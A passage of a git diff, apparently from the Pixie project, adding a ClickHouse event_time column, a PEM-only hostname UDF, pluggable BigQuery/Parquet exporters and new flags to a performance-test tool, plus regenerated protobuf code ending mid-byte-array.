= false; + int time_col_index = -1; + for (const auto& mapping : plan_node_->column_mappings()) { + if (mapping.clickhouse_column_name() == "time_") { + has_time_ = true; + time_col_index = mapping.input_column_index(); + } + if (mapping.clickhouse_column_name() == "event_time") { + has_event_time = true; + } + } + + if (has_time_ && !has_event_time && time_col_index >= 0) { + auto arrow_col = rb.ColumnAt(time_col_index); + int64_t num_rows = arrow_col->length(); + auto event_time_col = std::make_shared<clickhouse::ColumnDateTime64>(3); + for (int64_t i = 0; i < num_rows; ++i) { + int64_t ns_val = types::GetValueFromArrowArray<types::DataType::TIME64NS>(arrow_col.get(), i); + // Convert nanoseconds to milliseconds for DateTime64(3) + event_time_col->Append(ns_val / 1000000LL); + } + block.AppendColumn("event_time", event_time_col); + } + // Insert the block into ClickHouse clickhouse_client_->Insert(plan_node_->table_name(), block); diff --git a/src/carnot/funcs/metadata/metadata_ops.cc b/src/carnot/funcs/metadata/metadata_ops.cc index 3fe4e21692d..d6409e6f456 100644 --- a/src/carnot/funcs/metadata/metadata_ops.cc +++ b/src/carnot/funcs/metadata/metadata_ops.cc @@ -127,6 +127,7 @@ void RegisterMetadataOpsOrDie(px::carnot::udf::Registry* registry) { registry->RegisterOrDie<UPIDToDeploymentIDUDF>("upid_to_deployment_id"); registry->RegisterOrDie<UPIDToStringUDF>("upid_to_string"); registry->RegisterOrDie<HostnameUDF>("_exec_hostname"); + registry->RegisterOrDie<PEMHostnameUDF>("_pem_hostname"); registry->RegisterOrDie<HostNumCPUsUDF>("_exec_host_num_cpus"); registry->RegisterOrDie<VizierIDUDF>("vizier_id"); registry->RegisterOrDie<VizierNameUDF>("vizier_name"); diff --git a/src/carnot/funcs/metadata/metadata_ops.h b/src/carnot/funcs/metadata/metadata_ops.h index 241079858a4..af82f9738f8 100644 --- a/src/carnot/funcs/metadata/metadata_ops.h +++ b/src/carnot/funcs/metadata/metadata_ops.h @@ -2926,6 +2926,33 @@ class HostnameUDF : public ScalarUDF { } }; +class PEMHostnameUDF : public ScalarUDF { + public: + /** + * @brief Gets the hostname of the PEM agent's machine. + * Unlike _exec_hostname (UDF_ALL), this is restricted to UDF_PEM so the + * distributed planner is forced to execute it on the PEM before data is + * shipped to Kelvin. Use this when the hostname must reflect the agent + * that collected the data rather than the agent that exports it. 
+ */ + StringValue Exec(FunctionContext* ctx) { + auto md = GetMetadataState(ctx); + return md->hostname(); + } + + static udf::ScalarUDFDocBuilder Doc() { + return udf::ScalarUDFDocBuilder("Get the hostname of the PEM agent.") + .Details( + "Get the hostname of the PEM agent that collected the data. " + "This UDF is restricted to PEM execution, so the distributed planner " + "will always run it on the PEM even when the downstream sink is on Kelvin.") + .Example("df.hostname = px._pem_hostname()") + .Returns("The hostname of the PEM agent."); + } + + static udfspb::UDFSourceExecutor Executor() { return udfspb::UDFSourceExecutor::UDF_PEM; } +}; + class HostNumCPUsUDF : public ScalarUDF { public: /** diff --git a/src/e2e_test/perf_tool/cmd/BUILD.bazel b/src/e2e_test/perf_tool/cmd/BUILD.bazel index 012fd3488b0..23540786c4b 100644 --- a/src/e2e_test/perf_tool/cmd/BUILD.bazel +++ b/src/e2e_test/perf_tool/cmd/BUILD.bazel @@ -33,6 +33,7 @@ go_library( "//src/e2e_test/perf_tool/pkg/cluster", "//src/e2e_test/perf_tool/pkg/cluster/gke", "//src/e2e_test/perf_tool/pkg/cluster/local", + "//src/e2e_test/perf_tool/pkg/exporter", "//src/e2e_test/perf_tool/pkg/pixie", "//src/e2e_test/perf_tool/pkg/run", "//src/e2e_test/perf_tool/pkg/suites", diff --git a/src/e2e_test/perf_tool/cmd/run.go b/src/e2e_test/perf_tool/cmd/run.go index 5d8a89a9f7a..3ea06d5287b 100644 --- a/src/e2e_test/perf_tool/cmd/run.go +++ b/src/e2e_test/perf_tool/cmd/run.go @@ -45,6 +45,7 @@ import ( "px.dev/pixie/src/e2e_test/perf_tool/pkg/cluster" "px.dev/pixie/src/e2e_test/perf_tool/pkg/cluster/gke" "px.dev/pixie/src/e2e_test/perf_tool/pkg/cluster/local" + "px.dev/pixie/src/e2e_test/perf_tool/pkg/exporter" "px.dev/pixie/src/e2e_test/perf_tool/pkg/pixie" "px.dev/pixie/src/e2e_test/perf_tool/pkg/run" "px.dev/pixie/src/e2e_test/perf_tool/pkg/suites" @@ -74,9 +75,13 @@ func init() { RunCmd.Flags().String("api_key", "", "The Pixie API key to use for deploying pixie") RunCmd.Flags().String("cloud_addr", "withpixie.ai:443", "The Pixie Cloud address to use for deploying pixie") + RunCmd.Flags().String("export_backend", "bq", "Export backend: 'bq' or 'parquet-gcs'") RunCmd.Flags().String("bq_project", "pl-pixies", "The gcloud project to put bigquery results/specs in") RunCmd.Flags().String("bq_dataset", "px_perf", "The name of the bigquery dataset to put results/specs in") RunCmd.Flags().String("bq_dataset_loc", "us-west1", "The gcloud region for the bigquery dataset") + RunCmd.Flags().String("gcs_bucket", "", "GCS bucket for parquet export (required when export_backend=parquet-gcs)") + RunCmd.Flags().String("gcs_prefix", "", "Path prefix within the GCS bucket for parquet export") + RunCmd.Flags().Int("parquet_batch_size", 10000, "Number of rows per parquet file when using parquet-gcs backend") RunCmd.Flags().String("gke_project", "pl-pixies", "The gcloud project to use for GKE clusters") RunCmd.Flags().String("gke_zone", "us-west1-a", "The gcloud zone to use for GKE clusters") @@ -95,6 +100,10 @@ func init() { RunCmd.Flags().String("ds_experiment_page_id", "p_g7fj6pf4yc", "The unique ID of the datastudio experiment page, used to print links to datastudio views") RunCmd.Flags().Bool("pretty", false, "Pretty print output json") + RunCmd.Flags().StringSlice("prom_recorder_override", []string{}, "Override kubeconfig/kube_context for a named prometheus recorder. Format: name=kubeconfig_path:kube_context (either side may be empty). 
Repeatable.") + RunCmd.Flags().Bool("keep_on_failure", false, "If the experiment fails, skip teardown (stop vizier/workloads/recorders and cluster cleanup) so the cluster state can be inspected. Implies --max_retries=1.") + RunCmd.Flags().String("skaffold_stderr_file", "", "If set, skaffold's stderr (build/render output) is appended to this file in addition to perf_tool's stderr. Useful in CI to capture a clean log to cat after a failure.") + RootCmd.AddCommand(RunCmd) } @@ -131,6 +140,15 @@ func runCmd(ctx context.Context, cmd *cobra.Command) error { return err } + promOverrides, err := parsePromRecorderOverrides(viper.GetStringSlice("prom_recorder_override")) + if err != nil { + log.WithError(err).Error("failed to parse --prom_recorder_override flags") + return err + } + for _, spec := range specs { + applyPromRecorderOverrides(spec, promOverrides) + } + var c cluster.Provider if viper.GetBool("use_local_cluster") { c = &local.ClusterProvider{} @@ -162,20 +180,24 @@ func runCmd(ctx context.Context, cmd *cobra.Command) error { } } - resultTable, err := createResultTable() + metricsExporter, err := createExporter(ctx) if err != nil { - log.WithError(err).Error("failed to create results table") - return err - } - specTable, err := createSpecTable() - if err != nil { - log.WithError(err).Error("failed to create spec table") + log.WithError(err).Error("failed to create exporter") return err } + defer metricsExporter.Close() containerRegistryRepo := viper.GetString("container_repo") + skaffoldStderrFile := viper.GetString("skaffold_stderr_file") maxRetries := viper.GetInt("max_retries") numRuns := viper.GetInt("num_runs") + keepOnFailure := viper.GetBool("keep_on_failure") + if keepOnFailure { + if maxRetries > 1 { + log.Warn("--keep_on_failure is set; forcing --max_retries=1 to avoid retries racing with preserved cluster state") + } + maxRetries = 1 + } eg := errgroup.Group{} experiments := make(chan *exp, len(specs)*numRuns) @@ -189,7 +211,7 @@ func runCmd(ctx context.Context, cmd *cobra.Command) error { s := spec n := name eg.Go(func() error { - expID, err := runExperiment(ctx, s, c, pxAPIKey, pxCloudAddr, resultTable, specTable, containerRegistryRepo, maxRetries) + expID, err := runExperiment(ctx, s, c, pxAPIKey, pxCloudAddr, metricsExporter, containerRegistryRepo, skaffoldStderrFile, maxRetries, keepOnFailure) if err != nil { log.WithError(err).Error("failed to run experiment") return err @@ -257,10 +279,11 @@ func runExperiment( c cluster.Provider, pxAPIKey string, pxCloudAddr string, - resultTable *bq.Table, - specTable *bq.Table, + metricsExporter exporter.Exporter, containerRegistryRepo string, + skaffoldStderrFile string, maxRetries int, + keepOnFailure bool, ) (uuid.UUID, error) { var expID uuid.UUID bo := &maxRetryBackoff{ @@ -268,7 +291,8 @@ func runExperiment( } op := func() error { pxCtx := pixie.NewContext(pxAPIKey, pxCloudAddr) - r := run.NewRunner(c, pxCtx, resultTable, specTable, containerRegistryRepo) + r := run.NewRunner(c, pxCtx, metricsExporter, containerRegistryRepo, skaffoldStderrFile) + r.SetKeepOnFailure(keepOnFailure) var err error expID, err = uuid.NewV4() if err != nil { @@ -335,7 +359,24 @@ func getExperimentSpecs() (map[string]*experimentpb.ExperimentSpec, error) { return nil, errors.New("must specify one of --experiment_proto or --suite") } -func createResultTable() (*bq.Table, error) { +func createExporter(ctx context.Context) (exporter.Exporter, error) { + switch viper.GetString("export_backend") { + case "bq": + return createBQExporter() + case 
"parquet-gcs": + bucket := viper.GetString("gcs_bucket") + if bucket == "" { + return nil, errors.New("--gcs_bucket is required when using parquet-gcs backend") + } + prefix := viper.GetString("gcs_prefix") + batchSize := viper.GetInt("parquet_batch_size") + return exporter.NewParquetGCSExporter(ctx, bucket, prefix, batchSize) + default: + return nil, fmt.Errorf("unknown export backend: %s", viper.GetString("export_backend")) + } +} + +func createBQExporter() (*exporter.BQExporter, error) { bqProject := viper.GetString("bq_project") bqDataset := viper.GetString("bq_dataset") bqDatasetLoc := viper.GetString("bq_dataset_loc") @@ -343,15 +384,16 @@ func createResultTable() (*bq.Table, error) { Type: bigquery.DayPartitioningType, Field: "timestamp", } - return bq.NewTableForStruct(bqProject, bqDataset, bqDatasetLoc, "results", timePartitioning, run.ResultRow{}) -} - -func createSpecTable() (*bq.Table, error) { - bqProject := viper.GetString("bq_project") - bqDataset := viper.GetString("bq_dataset") - bqDatasetLoc := viper.GetString("bq_dataset_loc") - var timePartitioning *bigquery.TimePartitioning - return bq.NewTableForStruct(bqProject, bqDataset, bqDatasetLoc, "specs", timePartitioning, run.SpecRow{}) + resultTable, err := bq.NewTableForStruct(bqProject, bqDataset, bqDatasetLoc, "results", timePartitioning, exporter.ResultRow{}) + if err != nil { + return nil, err + } + var specTimePartitioning *bigquery.TimePartitioning + specTable, err := bq.NewTableForStruct(bqProject, bqDataset, bqDatasetLoc, "specs", specTimePartitioning, exporter.SpecRow{}) + if err != nil { + return nil, err + } + return exporter.NewBQExporter(resultTable, specTable), nil } func getNumNodesInCluster(ctx context.Context, c cluster.Provider) (int, error) { @@ -388,3 +430,50 @@ func datastudioLink(dsReportID string, dsExperimentPageID string, expID uuid.UUI encodedParams := url.QueryEscape(params) return fmt.Sprintf("https://datastudio.google.com/reporting/%s/page/%s?params=%s", dsReportID, dsExperimentPageID, encodedParams) } + +type promRecorderOverride struct { + KubeconfigPath string + KubeContext string +} + +func parsePromRecorderOverrides(raw []string) (map[string]promRecorderOverride, error) { + out := make(map[string]promRecorderOverride, len(raw)) + for _, s := range raw { + nameAndVal := strings.SplitN(s, "=", 2) + if len(nameAndVal) != 2 || nameAndVal[0] == "" { + return nil, fmt.Errorf("invalid --prom_recorder_override %q: expected name=kubeconfig:context", s) + } + parts := strings.SplitN(nameAndVal[1], ":", 2) + ov := promRecorderOverride{KubeconfigPath: parts[0]} + if len(parts) == 2 { + ov.KubeContext = parts[1] + } + if ov.KubeconfigPath == "" && ov.KubeContext == "" { + return nil, fmt.Errorf("invalid --prom_recorder_override %q: at least one of kubeconfig or context must be set", s) + } + out[nameAndVal[0]] = ov + } + return out, nil +} + +func applyPromRecorderOverrides(spec *experimentpb.ExperimentSpec, overrides map[string]promRecorderOverride) { + if len(overrides) == 0 { + return + } + for _, m := range spec.MetricSpecs { + prom := m.GetProm() + if prom == nil || prom.Name == "" { + continue + } + ov, ok := overrides[prom.Name] + if !ok { + continue + } + if ov.KubeconfigPath != "" { + prom.KubeconfigPath = ov.KubeconfigPath + } + if ov.KubeContext != "" { + prom.KubeContext = ov.KubeContext + } + } +} diff --git a/src/e2e_test/perf_tool/experimentpb/experiment.pb.go b/src/e2e_test/perf_tool/experimentpb/experiment.pb.go index dc43e5d79be..923ed6cc1b9 100755 --- 
a/src/e2e_test/perf_tool/experimentpb/experiment.pb.go +++ b/src/e2e_test/perf_tool/experimentpb/experiment.pb.go @@ -647,8 +647,9 @@ func (m *PatchTarget) GetAnnotationSelector() string { } type PrerenderedDeploy struct { - YAMLPaths []string `protobuf:"bytes,1,rep,name=yaml_paths,json=yamlPaths,proto3" json:"yaml_paths,omitempty"` - Patches []*PatchSpec `protobuf:"bytes,2,rep,name=patches,proto3" json:"patches,omitempty"` + YAMLPaths []string `protobuf:"bytes,1,rep,name=yaml_paths,json=yamlPaths,proto3" json:"yaml_paths,omitempty"` + Patches []*PatchSpec `protobuf:"bytes,2,rep,name=patches,proto3" json:"patches,omitempty"` + SkipNamespaceDelete bool `protobuf:"varint,3,opt,name=skip_namespace_delete,json=skipNamespaceDelete,proto3" json:"skip_namespace_delete,omitempty"` } func (m *PrerenderedDeploy) Reset() { *m = PrerenderedDeploy{} } @@ -697,6 +698,13 @@ func (m *PrerenderedDeploy) GetPatches() []*PatchSpec { return nil } +func (m *PrerenderedDeploy) GetSkipNamespaceDelete() bool { + if m != nil { + return m.SkipNamespaceDelete + } + return false +} + type SkaffoldDeploy struct { SkaffoldPath string `protobuf:"bytes,1,opt,name=skaffold_path,json=skaffoldPath,proto3" json:"skaffold_path,omitempty"` SkaffoldArgs []string `protobuf:"bytes,2,rep,name=skaffold_args,json=skaffoldArgs,proto3" json:"skaffold_args,omitempty"` @@ -1254,6 +1262,9 @@ type PrometheusScrapeSpec struct { Port int32 `protobuf:"varint,4,opt,name=port,proto3" json:"port,omitempty"` ScrapePeriod *types.Duration `protobuf:"bytes,5,opt,name=scrape_period,json=scrapePeriod,proto3" json:"scrape_period,omitempty"` MetricNames map[string]string `protobuf:"bytes,6,rep,name=metric_names,json=metricNames,proto3" json:"metric_names,omitempty" protobuf_key:"bytes,1,opt,name=key,proto3" protobuf_val:"bytes,2,opt,name=value,proto3"` + KubeconfigPath string `protobuf:"bytes,7,opt,name=kubeconfig_path,json=kubeconfigPath,proto3" json:"kubeconfig_path,omitempty"` + KubeContext string `protobuf:"bytes,8,opt,name=kube_context,json=kubeContext,proto3" json:"kube_context,omitempty"` + Name string `protobuf:"bytes,9,opt,name=name,proto3" json:"name,omitempty"` } func (m *PrometheusScrapeSpec) Reset() { *m = PrometheusScrapeSpec{} } @@ -1330,6 +1341,27 @@ func (m *PrometheusScrapeSpec) GetMetricNames() map[string]string { return nil } +func (m *PrometheusScrapeSpec) GetKubeconfigPath() string { + if m != nil { + return m.KubeconfigPath + } + return "" +} + +func (m *PrometheusScrapeSpec) GetKubeContext() string { + if m != nil { + return m.KubeContext + } + return "" +} + +func (m *PrometheusScrapeSpec) GetName() string { + if m != nil { + return m.Name + } + return "" +} + type ClusterSpec struct { NumNodes int32 `protobuf:"varint,1,opt,name=num_nodes,json=numNodes,proto3" json:"num_nodes,omitempty"` Node *NodeSpec `protobuf:"bytes,2,opt,name=node,proto3" json:"node,omitempty"` @@ -1560,119 +1592,124 @@ func init() { } var fileDescriptor_96d7e52dda1e6fe3 = []byte{ - // 1786 bytes of a gzipped FileDescriptorProto - 0x1f, 0x8b, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0xff, 0xac, 0x58, 0xcd, 0x73, 0x1b, 0x49, - 0x15, 0xd7, 0x48, 0xb2, 0x25, 0x3d, 0xc9, 0xb2, 0xdc, 0xf9, 0x40, 0xf1, 0xa6, 0xe4, 0xec, 0x6c, - 0x01, 0x21, 0xec, 0x5a, 0x24, 0xcb, 0x87, 0xd9, 0x2c, 0x5b, 0x25, 0xc9, 0x06, 0x2b, 0x71, 0x6c, - 0xd1, 0xf2, 0x7a, 0x61, 0x8b, 0xaa, 0xa9, 0xf6, 0x4c, 0x47, 0x9a, 0xf2, 0x7c, 0x65, 0xba, 0x95, - 0xb5, 0x39, 0x71, 0xa1, 0x38, 0x51, 0xc5, 0x01, 0xfe, 0x03, 0x0e, 0xfc, 0x09, 0xdc, 0x39, 0x00, - 0xb7, 0x1c, 0xf7, 0xe4, 0x22, 0xca, 0x85, 
0xe3, 0x1e, 0xb8, 0x43, 0xf5, 0xc7, 0x8c, 0x46, 0xb2, - 0x92, 0x40, 0x15, 0xb7, 0x9e, 0x5f, 0xff, 0xde, 0xeb, 0xd7, 0xaf, 0xfb, 0xf7, 0x5e, 0x4b, 0xf0, - 0x5d, 0x16, 0xdb, 0x6d, 0xfa, 0x80, 0x5a, 0x9c, 0x32, 0xde, 0x8e, 0x68, 0xfc, 0xd4, 0xe2, 0x61, - 0xe8, 0xb5, 0xe9, 0x79, 0x44, 0x63, 0xd7, 0xa7, 0x01, 0x8f, 0x4e, 0x33, 0x1f, 0xdb, 0x51, 0x1c, - 0xf2, 0x10, 0xd5, 0xa2, 0xf3, 0xed, 0x94, 0xbb, 0xd9, 0x1a, 0x85, 0xe1, 0xc8, 0xa3, 0x6d, 0x39, - 0x77, 0x3a, 0x79, 0xda, 0x76, 0x26, 0x31, 0xe1, 0x6e, 0x18, 0x28, 0xf6, 0xe6, 0xf5, 0x51, 0x38, - 0x0a, 0xe5, 0xb0, 0x2d, 0x46, 0x0a, 0x35, 0xff, 0x9d, 0x87, 0xfa, 0x5e, 0xea, 0x78, 0x18, 0x51, - 0x1b, 0x3d, 0x84, 0xea, 0x73, 0xf7, 0x97, 0x2e, 0x8d, 0x2d, 0x16, 0x51, 0xbb, 0x69, 0xdc, 0x31, - 0xee, 0x56, 0x1f, 0x6c, 0x6e, 0x67, 0x17, 0xdb, 0xfe, 0x2c, 0x8c, 0xcf, 0xbc, 0x90, 0x38, 0xc2, - 0x00, 0x83, 0xa2, 0x4b, 0xe3, 0x0e, 0xd4, 0xbf, 0xd0, 0x73, 0xd2, 0x9c, 0x35, 0xf3, 0x77, 0x0a, - 0x6f, 0xb1, 0x5f, 0xfb, 0x22, 0xf3, 0xc5, 0xd0, 0x43, 0xa8, 0xf9, 0x94, 0xc7, 0xae, 0xad, 0x1d, - 0x14, 0xa4, 0x83, 0xe6, 0xbc, 0x83, 0x27, 0x92, 0x21, 0xcd, 0xab, 0x7e, 0x3a, 0x66, 0xe8, 0x63, - 0xa8, 0xd9, 0xde, 0x84, 0xf1, 0x24, 0xfa, 0xa2, 0x8c, 0xfe, 0xd6, 0xbc, 0x71, 0x4f, 0x31, 0x94, - 0xb5, 0x3d, 0xfb, 0x40, 0xdf, 0x81, 0x72, 0x3c, 0x09, 0x94, 0xe5, 0x8a, 0xb4, 0xbc, 0x31, 0x6f, - 0x89, 0x27, 0x81, 0xb4, 0x2a, 0xc5, 0x6a, 0x80, 0xde, 0x07, 0xb0, 0x43, 0xdf, 0x77, 0xb9, 0xc5, - 0xc6, 0xa4, 0xb9, 0x7a, 0xc7, 0xb8, 0x5b, 0xe9, 0xae, 0x4d, 0x2f, 0xb7, 0x2a, 0x3d, 0x89, 0x0e, - 0xf7, 0x3b, 0xb8, 0xa2, 0x08, 0xc3, 0x31, 0x41, 0x08, 0x8a, 0x9c, 0x8c, 0x58, 0xb3, 0x74, 0xa7, - 0x70, 0xb7, 0x82, 0xe5, 0xd8, 0xfc, 0xab, 0x01, 0xb5, 0x6c, 0x3a, 0x04, 0x29, 0x20, 0x3e, 0x95, - 0x89, 0xaf, 0x60, 0x39, 0x16, 0x39, 0x71, 0x68, 0xe4, 0x85, 0x17, 0x16, 0xe3, 0x34, 0x4a, 0x92, - 0xba, 0x90, 0x93, 0x5d, 0xc9, 0x18, 0x72, 0x1a, 0xe1, 0xaa, 0x93, 0x8e, 0x19, 0xfa, 0x11, 0xd4, - 0xc6, 0x94, 0x78, 0x7c, 0x6c, 0x8f, 0xa9, 0x7d, 0x96, 0x24, 0x74, 0x21, 0x27, 0xfb, 0x92, 0xd1, - 0x13, 0x0c, 0x3c, 0x47, 0x47, 0xdf, 0x84, 0x75, 0x62, 0x8b, 0x8b, 0x64, 0x31, 0xea, 0x51, 0x9b, - 0x87, 0xb1, 0xcc, 0x6a, 0x05, 0xd7, 0x15, 0x3c, 0xd4, 0xa8, 0xf9, 0x77, 0x03, 0x60, 0x16, 0x03, - 0xea, 0x41, 0x35, 0x8a, 0x69, 0x4c, 0x03, 0x87, 0xc6, 0xd4, 0xd1, 0xf7, 0x68, 0x6b, 0x7e, 0xd5, - 0xc1, 0x8c, 0xa0, 0x2c, 0xf7, 0x73, 0x38, 0x6b, 0x85, 0x3e, 0x82, 0x32, 0x3b, 0x23, 0x4f, 0x9f, - 0x86, 0x9e, 0xd3, 0xcc, 0x4b, 0x0f, 0xb7, 0xe7, 0x3d, 0x0c, 0xf5, 0x6c, 0x6a, 0x9e, 0xf2, 0xd1, - 0xb7, 0x21, 0x1f, 0x9d, 0x37, 0x0b, 0xcb, 0x6e, 0xc0, 0xe0, 0xbc, 0x77, 0xd0, 0x4f, 0x4d, 0xf2, - 0xd1, 0x79, 0x77, 0x0d, 0x74, 0xce, 0x2c, 0x7e, 0x11, 0x51, 0xf3, 0xf7, 0x06, 0x54, 0x33, 0x29, - 0x41, 0x1f, 0x43, 0xe1, 0x6c, 0x87, 0x2d, 0xdf, 0xc4, 0xe3, 0x9d, 0xe1, 0x20, 0x74, 0x18, 0xa6, - 0xc4, 0xb9, 0x90, 0xec, 0x6e, 0x69, 0x7a, 0xb9, 0x55, 0x78, 0xbc, 0x33, 0xdc, 0xcf, 0x61, 0x61, - 0x86, 0x7e, 0x08, 0x85, 0xe8, 0xdc, 0x5b, 0xbe, 0x81, 0xc1, 0xf9, 0x41, 0x66, 0x21, 0x65, 0x2a, - 0xb0, 0x1c, 0x16, 0x36, 0xdd, 0x1a, 0x80, 0x3c, 0x07, 0x15, 0xd6, 0x7d, 0xd8, 0xb8, 0xb2, 0x1a, - 0xba, 0x0d, 0x15, 0x71, 0x49, 0x58, 0x44, 0xec, 0xe4, 0xd6, 0xcc, 0x00, 0xf3, 0x08, 0xea, 0xf3, - 0x4b, 0xa0, 0x9b, 0xb0, 0xca, 0xec, 0xd8, 0x8d, 0xb8, 0x26, 0xeb, 0x2f, 0xf4, 0x75, 0xa8, 0xb3, - 0x89, 0x6d, 0x53, 0xc6, 0x2c, 0x3b, 0xf4, 0x26, 0x7e, 0x20, 0x03, 0xae, 0xe0, 0x35, 0x8d, 0xf6, - 0x24, 0x68, 0xfe, 0x02, 0x2a, 0x03, 0xc2, 0xed, 0xb1, 0xbc, 0xac, 0xb7, 0xa1, 0x78, 0x41, 0x7c, - 0x4f, 0x79, 0xea, 0x96, 0xa7, 0x97, 0x5b, 0xc5, 0x9f, 0x77, 0x9e, 
0x1c, 0x60, 0x89, 0xa2, 0xfb, - 0xb0, 0xca, 0x49, 0x3c, 0xa2, 0x5c, 0x6f, 0x7d, 0xf1, 0x14, 0x84, 0x9b, 0x63, 0x49, 0xc0, 0x9a, - 0x68, 0xfe, 0x26, 0x0f, 0xd5, 0x0c, 0x8e, 0xbe, 0x05, 0x15, 0x12, 0xb9, 0xd6, 0x28, 0x0e, 0x27, - 0x91, 0x5e, 0xa5, 0x36, 0xbd, 0xdc, 0x2a, 0x77, 0x06, 0xfd, 0x9f, 0x08, 0x0c, 0x97, 0x49, 0xe4, - 0xca, 0x11, 0x6a, 0x43, 0x55, 0x50, 0x9f, 0xd3, 0x98, 0xb9, 0xa1, 0x0e, 0xbe, 0x5b, 0x9f, 0x5e, - 0x6e, 0x41, 0x67, 0xd0, 0x3f, 0x51, 0x28, 0x06, 0x12, 0xb9, 0x7a, 0x2c, 0x94, 0x76, 0xe6, 0x06, - 0x8e, 0xbc, 0x22, 0x15, 0x2c, 0xc7, 0xa9, 0xfa, 0x8a, 0x19, 0xf5, 0xcd, 0x25, 0x78, 0x65, 0x21, - 0xc1, 0x22, 0x6d, 0x1e, 0x39, 0xa5, 0xde, 0x4c, 0x1e, 0xab, 0x2a, 0x6d, 0x12, 0x4d, 0xd4, 0x81, - 0xda, 0x70, 0x8d, 0x04, 0x41, 0xc8, 0xc9, 0xbc, 0x94, 0x4a, 0x92, 0x8b, 0x66, 0x53, 0xa9, 0x9c, - 0x38, 0x6c, 0x5c, 0x91, 0x87, 0xa8, 0x37, 0x22, 0xb3, 0x56, 0x44, 0xf8, 0x58, 0x5c, 0xc7, 0x42, - 0x52, 0x6f, 0x44, 0xd6, 0x07, 0x02, 0xc4, 0x15, 0x41, 0x90, 0x43, 0x74, 0x1f, 0x4a, 0x91, 0xc8, - 0x25, 0x4d, 0x2a, 0xc6, 0xd7, 0x96, 0x1c, 0x80, 0x2a, 0x68, 0x9a, 0x67, 0xfe, 0xd6, 0x80, 0xfa, - 0xbc, 0xa6, 0xd0, 0x7b, 0xb0, 0x96, 0x68, 0x4a, 0xae, 0xab, 0xaf, 0x4d, 0x2d, 0x01, 0xc5, 0x5a, - 0x73, 0x24, 0x12, 0x8f, 0xd4, 0x82, 0x19, 0x52, 0x27, 0x1e, 0xcd, 0xc5, 0x53, 0xf8, 0x2f, 0xe3, - 0xb9, 0x80, 0x6a, 0x46, 0xac, 0xe2, 0x78, 0xa4, 0x77, 0x43, 0x55, 0x50, 0x31, 0x46, 0x2d, 0x80, - 0xf4, 0x34, 0x92, 0x75, 0x33, 0x08, 0xfa, 0x3e, 0xd4, 0x19, 0xe5, 0x56, 0xd2, 0x17, 0x5c, 0x75, - 0xe0, 0xe5, 0x6e, 0x63, 0x7a, 0xb9, 0x55, 0x1b, 0x52, 0xae, 0xdb, 0x41, 0x7f, 0x17, 0xd7, 0xd8, - 0xec, 0xcb, 0x31, 0xff, 0x6c, 0x00, 0xcc, 0xfa, 0x0c, 0xda, 0x51, 0x22, 0x56, 0x25, 0xe0, 0x9d, - 0x2b, 0x22, 0x1e, 0x4a, 0x11, 0x09, 0xe6, 0xa2, 0x86, 0xd1, 0x0e, 0x14, 0xa3, 0x38, 0xf4, 0xb5, - 0x08, 0xcc, 0xc5, 0x12, 0x18, 0xfa, 0x94, 0x8f, 0xe9, 0x84, 0x0d, 0xed, 0x98, 0x44, 0x54, 0x78, - 0xd8, 0xcf, 0x61, 0x69, 0xb1, 0xac, 0xf6, 0x3a, 0xcb, 0x6a, 0xaf, 0x28, 0x5f, 0xba, 0x69, 0xca, - 0x3a, 0x31, 0x2d, 0xc0, 0xda, 0x5c, 0x4c, 0xaf, 0x15, 0xfd, 0x6d, 0xa8, 0x30, 0x1e, 0x53, 0xe2, - 0xbb, 0xc1, 0x48, 0x06, 0x58, 0xc6, 0x33, 0x00, 0xfd, 0x18, 0x36, 0xec, 0xd0, 0x13, 0x6b, 0x88, - 0x18, 0xc4, 0x33, 0x21, 0x74, 0xd2, 0x8a, 0xaa, 0x1e, 0x1c, 0xdb, 0xc9, 0x83, 0x63, 0x7b, 0x57, - 0x3f, 0x38, 0x70, 0x63, 0x66, 0x33, 0x90, 0x26, 0xe8, 0x67, 0xb0, 0xce, 0xa9, 0x1f, 0x79, 0x84, - 0x53, 0xeb, 0x39, 0xf1, 0x26, 0x94, 0x35, 0x8b, 0xf2, 0x02, 0xb4, 0xdf, 0x90, 0xc7, 0xed, 0x63, - 0x6d, 0x72, 0x22, 0x2d, 0xf6, 0x02, 0x1e, 0x5f, 0xe0, 0x3a, 0x9f, 0x03, 0x11, 0x86, 0x35, 0x4e, - 0x4e, 0x3d, 0x6a, 0x85, 0x13, 0x1e, 0x4d, 0x38, 0x6b, 0xae, 0x48, 0xbf, 0x1f, 0xbc, 0xd1, 0xaf, - 0x30, 0x38, 0x52, 0x7c, 0xe5, 0xb5, 0xc6, 0x33, 0xd0, 0x66, 0x07, 0xae, 0x2d, 0x59, 0x1a, 0x35, - 0xa0, 0x70, 0x46, 0x2f, 0x74, 0xfe, 0xc4, 0x10, 0x5d, 0x87, 0x15, 0xb9, 0x1b, 0x5d, 0x28, 0xd5, - 0xc7, 0x47, 0xf9, 0x1d, 0x63, 0xf3, 0x14, 0x36, 0xae, 0xac, 0xb2, 0xc4, 0xc1, 0x0f, 0xb2, 0x0e, - 0xaa, 0x0f, 0xde, 0x7d, 0x4d, 0xd4, 0xca, 0xcb, 0x81, 0xcb, 0x78, 0x66, 0x0d, 0x13, 0xc3, 0xb5, - 0x25, 0x0c, 0xf4, 0x10, 0x4a, 0x49, 0x2e, 0x0c, 0x99, 0x8b, 0x37, 0x7b, 0x55, 0x72, 0xd3, 0x16, - 0xe6, 0x5f, 0x8c, 0x2b, 0x4e, 0xe5, 0xf5, 0x79, 0x04, 0x6b, 0xcc, 0x0d, 0x46, 0x1e, 0xb5, 0xd4, - 0x35, 0xd3, 0x32, 0x78, 0x6f, 0xa1, 0x19, 0x4b, 0x8a, 0xd2, 0xcc, 0xe0, 0xfc, 0x40, 0xd9, 0xef, - 0xe7, 0x70, 0x8d, 0x65, 0x26, 0xd0, 0x4f, 0x61, 0xc3, 0x21, 0x9c, 0x58, 0x5e, 0x28, 0x3b, 0xcd, - 0x24, 0xe0, 0x34, 0xd6, 0x09, 0x58, 0xf0, 0xb7, 0x4b, 0x38, 0x39, 0x08, 0x45, 0xe7, 0x91, 
